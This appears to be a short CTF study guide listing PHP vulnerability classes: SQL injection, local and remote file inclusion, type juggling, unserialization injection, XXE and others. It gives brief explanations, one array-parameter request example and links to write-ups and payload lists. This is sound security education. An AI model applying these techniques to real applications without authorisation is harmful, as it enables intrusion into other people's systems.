Pwning PHP CTF Challenges
This is a short "guide", or list of common PHP vulnerabilties you'll find in CTF challenges. Please note that this guide is not tailored towards real-world PHP applications!
The best way to get practice with a lot of these vulnerabilities is the websec.fr wargame!
1. SQL Injection
Tons of PHP applications are vulnerable to SQL injection, even in the real world! Biggest reason for this? Tons of old PHP "database tutorials" used code samples that were vulnerable to SQL injection. Also, PHP is an easy beginners language, many devs are self-taught, and do not have any security knowledge.
Note that these challenges mostly test your knowledge of SQL, not of PHP.
Reading Links:
- Intro: https://ctf101.org/web-exploitation/sql-injection/what-is-sql-injection/
- Intro: https://en.wikipedia.org/wiki/SQL_injection#Incorrectly_filtered_escape_characters
- Hands-On Testing: https://github.com/ryotosaito/beginner-sqli
- Challenge Writeup: https://github.com/ctfs/write-ups-2014/tree/master/pico-ctf-2014/web-exploitation/injection-3-130
- Challenge Writeup: https://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/
- Tips & Tricks: https://medium.com/bugbountywriteup/sql-injection-in-ctf-bef1ae0c5d9b
- Tips & Tricks: https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF
2. RFI/LFI
Remote file inclusion and local file inclusion vulnerabilities are abundant in PHP due to its stream wrappers api. Learn how to use it!
Any time code uses include
, fopen
, file_get_contents
, file_put_contents
, require_once
or a whole host of other functions, it is potentially vulnerable!
Reading Links:
- Intro: https://en.wikipedia.org/wiki/File_inclusion_vulnerability#Local_File_Inclusion
- Intro: https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/
- Tips & Tricks: https://github.com/qazbnm456/awesome-security-trivia/blob/master/Tricky-ways-to-exploit-PHP-Local-File-Inclusion.md
- Tips & Tricks: https://github.com/lucyoa/ctf-wiki/tree/master/web/file-inclusion
3. Type Errors/Type Juggling
PHP has no type safety, and developers must check every type with function calls such as is_string
to ensure parameters are the correct type. Unfortunately, developers are often lazy or forget to perform these checks.
One common way to exploit this is passing a HTTP parameter as an array instead of a string.
For example, the site may read the request parameter $_GET['q']
. Normally, this is a string, as it is in the url: http://vulnerable.site/search.php?q=hello
. But, you can pass in an array instead via a requirest such as: http://vulnerable.site/search.php?q[0]=hello&q[1]=world
Type juggling is another (similar) vulnerability where comparisons are made with ==
instead of ===
, and automatic type conversion occurs. This can lead to exploitable bugs within the application.
Reading Links:
- Writeup: https://github.com/bl4de/ctf/blob/master/2015/BostonKeyPartyCTF_2015/Prudential.md
- Writeup: https://github.com/bl4de/ctf/blob/master/2015/BostonKeyPartyCTF_2015/Prudential.md
- Writeup: https://medium.com/@yashitmaheshwary/baby-php-web-challenge-writeup-hacklu-ctf-2018-3db6c72926cb
- https://blog.alertlogic.com/blog/writing-exploits-for-exotic-bug-classes-php-type-juggling/
4. Object Unserialization Injection
As usual, arbitrary object unserialization isn't safe. You can inject arbitrary objects to trigger logical bugs, or potentially call certain magic methods inside the PHP application.
Reading Links:
- Intro: https://www.owasp.org/index.php/PHP_Object_Injection
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure deserialization/PHP.md
- Writeup: https://hack.more.systems/writeup/2016/10/02/tumctf-web50/
- Writeup: https://blog.0daylabs.com/2016/04/03/unserialize-php-object-injection/https://blog.0daylabs.com/2016/04/03/unserialize-php-object-injection/
- Advanced Serialization Info: http://www.phpinternalsbook.com/classes_objects/serialization.html
- List of Types: https://www.evonide.com/fuzzing-unserialize/
5. Other Misc. Stuff
I'll be adding to this list as I see new things...
- Sandbox escaping: http://blog.dornea.nu/2016/06/20/ringzer0-ctf-jail-escaping-php/
- Null byte injection: http://php.net/manual/en/security.filesystem.nullbytes.php
- XXE attack (XML injection): https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE injection
preg_replace
/e flag: https://bitquark.co.uk/blog/2013/07/23/the_unexpected_dangers_of_preg_replace